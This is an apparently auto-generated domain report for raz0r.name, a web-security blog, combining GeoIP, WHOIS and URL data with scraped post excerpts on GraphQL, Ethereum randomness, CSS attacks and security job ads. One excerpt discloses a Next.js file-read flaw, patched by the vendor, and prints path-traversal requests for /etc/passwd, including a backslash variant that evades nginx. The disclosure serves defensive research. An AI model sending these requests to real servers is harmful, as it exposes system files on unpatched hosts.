raz0r.name Report : Visit Site

Technical data of the raz0r.name

Geo IP provides you such as latitude, longitude and ISP (Internet Service Provider) etc. informations. Our GeoIP service found where is host raz0r.name. Currently, hosted in Russian Federation and its service provider is Reg.Ru Hosting .

davehope.co.uk 

HTTP Header Analysis

HTTP Header information is a part of HTTP protocol that a user's browser sends to called nginx containing the details of what the browser wants and will accept back from the web server.

DNS

HtmlToText

<? raz0r.name — web application security blog predicting random numbers in ethereum smart contracts 1 february 2018 talks raz0r 0 comments blockchain , ethereum , security , smart contracts slides from my appsec california 2018 talk “predicting random numbers in ethereum smart contracts” detailed blog post: https://blog.positive.com/predicting-random-numbers-in-ethereum-smart-contracts-e5358c6b8620 -- looting graphql endpoints for fun and profit 8 june 2017 articles raz0r 3 comments graphql , javascript , rpc , security in one of the previous posts about the state of modern web applications security i mentioned graphql – a new technology for building apis developed by facebook. graphql is rapidly gaining popularity, more and more services switch to this technology, both web and mobile applications. some of the graphql users are: github, shopify, pintereset, hackerone and many more . you can find many posts about graphql benefits and advantages over classic rest api on the internet, however there is not so much information about graphql security considerations. in this post i would like to elaborate on graphql: how it works, what the weak points are, how an attacker can abuse them, and which tools can be used. more » -- arbitrary file reading in next.js < 2.4.1 2 june 2017 vulnerabilities raz0r 0 comments javascript , nextjs , react next.js is a quite popular (>13k stars on github) framework for server-rendered react applications. it includes a nodejs server which allows to render html pages dynamically. while digging into server’s code, a list of internal routes drew my attention: defineroutes () { const routes = { /* ... */ '/_next/:path+': async (req, res, params) => { const p = join(__dirname, '..', 'client', ...(params.path || [])) await this.servestatic(req, res, p) }, '/static/:path+': async (req, res, params) => { const p = join(this.dir, 'static', ...(params.path || [])) await this.servestatic(req, res, p) } /* ... */ } as you can see you can pass arbitrary path into servestatic() function via /_next/ and /static/ endpoints: export function servestatic (req, res, path) { return new promise((resolve, reject) => { send(req, path) .on('directory', () => { // we don't allow directories to be read. const err = new error('no directory access') err.code = 'enoent' reject(err) }) .on('error', reject) .pipe(res) .on('finish', resolve) }) } this function just pipes the contents of files into the output without any validation or restrictions. so, we can try to perform a path traversal: get /_next/../../../../../../../../../etc/passwd http/1.1 and it works! however, nodejs application servers are usually deployed behind nginx. due to path normalization in nginx we cannot just use forward slashes and dots, nginx will return a bad request error code. luckily, nodejs server transforms backslashes into forward slashes, so we can bypass nginx validation. get /_next\..\..\..\..\..\..\..\..\..\etc\passwd http/1.1 zeit, the company which develops next.js, was very quick to respond and roll out the patch . be sure to update to the latest version. -- database firewall from scratch 25 may 2017 talks raz0r 1 comment mysql , phdays , sql-injection , waf , безопасность slides from our talk with denis kolegov at phdays 7 “database firewall from scratch” (+ bonus). database firewall from scratch from denis kolegov -- postmessage security in chrome extensions 4 april 2017 talks raz0r 0 comments chrome , javascript , owasp , rce , xss slides from my talk at owasp london meetup on the 30th of march, 2017. video crx postmessage scanner source code -- universal (isomorphic) web applications security 1 february 2017 articles raz0r 3 comments javascript , react , redux , безопасность nowadays you do not write things in jquery. you use node.js, webpack, react, redux, websockets, babel and a ton of other packages to help you create a basic todo web application. with frontend technologies developing rapidly, isomorphic (or to be correct universal ) web applications are a big thing now. in a nutshell, it means that you can write the code in javascript which can be run both on server and client side with reusable components, validators and shared state. lovely, isn’t it? as a frontend developer you would say that it definitely is. a security guy would argue since the approach is extremely unsafe for your data. more » -- waf.js: how to protect web applications using javascript 25 may 2016 talks raz0r 0 comments burp , csrf , dom , javascript , phdays , waf , xss , безопасность waf.js: how to protect web applications using javascript from denis kolegov -- обзор атак на клиента с помощью css 1 september 2015 articles raz0r 1 comment css , firefox , ie , rpo , xss css (cascading style sheets) – язык разметки для оформления внешнего вида веб-страниц, отделяющий визуальное представление от содержания. первая спецификация формата была опубликована организацией w3c в 1996 году. тогда css позволял делать самые простые вещи: покрасить блок текста цветом, оформить текст курсивом, выравнять абзац, сделать рамку. сегодня css стал настолько сложным, что для него создают фреймворки (bootstrap, jquery ui) и метаязыки (sass, scss, less), которые позволяют упростить написание стилей с помощью увеличения уровня абстракции css. бурное развитие css привлекло внимание исследователей безопасности, что вылилось в ряд техник, позволяющих проводить атаки на клиента с целью украсть его персональные данные: csrf-токены, историю посещений сайтов, списки email-контактов и т.д. начнем обзор с классических векторов, которые еще не потеряли свою актуальность. more » -- вебинар по распознаванию ботов с помощью машинного обучения 26 july 2015 news raz0r 0 comments в записи нет меток. в среду в 19:00 с моим коллегой андреем завгородним проводим вебинар “распознавание активности ботов с помощью алгоритмов машинного обучения” . ждем всех, кто интересуется машинным обучением и не только. и да, мы все еще ищем специалистов по веб-безопасности, хакеров и тех, кому интересно не только ломать, но и защищать для исследовательской работы в проекте pt application firewall . пишите на мою почту: [email protected] -- компания positive technologies срочно ищет веб-хакеров разной квалификации 23 january 2014 news raz0r 4 comments в записи нет меток. в первую очередь нам интересен ваш практический опыт в данном направлении, а не количество строчек в резюме. приветствуется наличие статей в блогах и на форумах, в журнале хакер, участие в ctf или bug-bounty программах. пожелания с технической стороны: наличие навыков практической компрометации и защиты веб-приложений; желателен опыт программирования на любом из языков: java, c#/vb (asp, asp.net), php, python, ruby (наиболее востребованы: java, c#/vb), sql; наличие собственных разработок и исследований, в том числе и опубликованных на тематических форумах и в блогах; наличие опубликованных данных об уязвимостях, обнаруженных вами. задачи, которые предлагаем: анализ защищенности веб-приложений и систем дбо ведущих российских и зарубежных компаний; проведение тестов на проникновение, участие в исследовательской деятельности отдела, посещение и участие в российских и международных конференциях; участие в организации конференции positive hack days; возможность вести собственные исследования в области иб; работа в команде признанных экспертов в иб. условия: «белая» заработная плата; дмс; 6 недель оплачиваемого отпуска. мы можем предложить работу в московском и питерском офисе компании, а так же удаленно. резюме/вопросы пишите на [email protected] -- next page »  tags smf xml opera cms xpath malware perl mssql dom lol clickjacking chrome unserialize tinymce owasp joomla osvdb blockchain ethereum google fuzzing security rce winbinder блоггинг hpp nextjs dezend react redux spring mvc rpo confidence graphql анонимность перевод phpbb python sqlbruter microsoft hash length extension ][akep криптография feedburner phdays zeronights css phpbugscanner defcon ssrf svn jsp expr

URL analysis for raz0r.name

http://raz0r.name/wp-content/uploads/2015/07/687474703a2f2f75706c6f61642e77696b696d656469612e6f72672f77696b6970656469612f656e2f7468756d622f612f61362f42656e6465725f526f6472696775657a2e706e672f32323070782d42656e6465725f526f6472696775657a2e706e67.png
https://raz0r.name/articles/universal-isomorphic-web-applications-security/#more-706
https://raz0r.name/tag/malware/
https://raz0r.name/2009/01/
https://raz0r.name/tag/smart-contracts/
https://raz0r.name/obzory/top-10-luchshix-onlajn-servisov-po-rasshifrovke-xeshej/#comment-229857
https://raz0r.name/tag/ssrf/
https://raz0r.name/2009/02/
https://raz0r.name/category/talks/
https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/
https://raz0r.name/tag/fuzzing/
https://raz0r.name/2009/05/
https://raz0r.name/tag/phpbb/
https://raz0r.name/tag/burp/
https://raz0r.name/tag/zeronights/

Whois Information

Whois is a protocol that is access to registering information. You can reach when the website was registered, when it will be expire, what is contact details of the site with the following informations. In a nutshell, it includes these informations;

Disclaimer: VeriSign, Inc. makes every effort to maintain the
completeness and accuracy of the Whois data, but cannot guarantee
that the results are error-free. Therefore, any data provided
through the Whois service are on an as is basis without any
warranties.
BY USING THE WHOIS SERVICE AND THE DATA CONTAINED
HEREIN OR IN ANY REPORT GENERATED WITH RESPECT THERETO, IT IS
ACCEPTED THAT VERISIGN, INC. IS NOT LIABLE FOR
ANY DAMAGES OF ANY KIND ARISING OUT OF, OR IN CONNECTION WITH, THE
REPORT OR THE INFORMATION PROVIDED BY THE WHOIS SERVICE, NOR
OMISSIONS OR MISSING INFORMATION. THE RESULTS OF ANY WHOIS REPORT OR
INFORMATION PROVIDED BY THE WHOIS SERVICE CANNOT BE RELIED UPON IN
CONTEMPLATION OF LEGAL PROCEEDINGS WITHOUT FURTHER VERIFICATION, NOR
DO SUCH RESULTS CONSTITUTE A LEGAL OPINION. Acceptance of the
results of the Whois constitutes acceptance of these terms,
conditions and limitations. Whois data may be requested only for
lawful purposes, in particular, to protect legal rights and
obligations. Illegitimate uses of Whois data include, but are not
limited to, unsolicited email, data mining, direct marketing or any
other improper purpose. Any request made for Whois data will be
documented by VeriSign, Inc. but will not be used for any commercial purpose whatsoever.

****

Registry Domain ID: 3527984_DOMAIN_NAME-VRSN
Domain Name: RAZ0R.NAME
Registrar: REGISTRAR OF DOMAIN NAMES REG.RU LLC
Registrar IANA ID: 1606
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

>>> Last update of whois database: 2018-02-08T18:21:24Z <<<

For more information on Whois status codes, please visit https://icann.org/epp


  REFERRER http://www.nic.name/

  REGISTRAR Global Name Registry

SERVERS

  SERVER name.whois-servers.net

  ARGS raz0r.name

  PORT 43

  TYPE domain

DOMAIN

  HANDLE 3527984_DOMAIN_NAME-VRSN

  NAME raz0r.name

STATUS
clientTransferProhibited https://icann.org/epp#clientTransferProhibited

NSERVER

  NS1.HOSTING.REG.RU 31.31.196.34

  NS2.HOSTING.REG.RU 31.31.194.3

  REGISTERED yes

Mistakes

The following list shows you to spelling mistakes possible of the internet users for the website searched .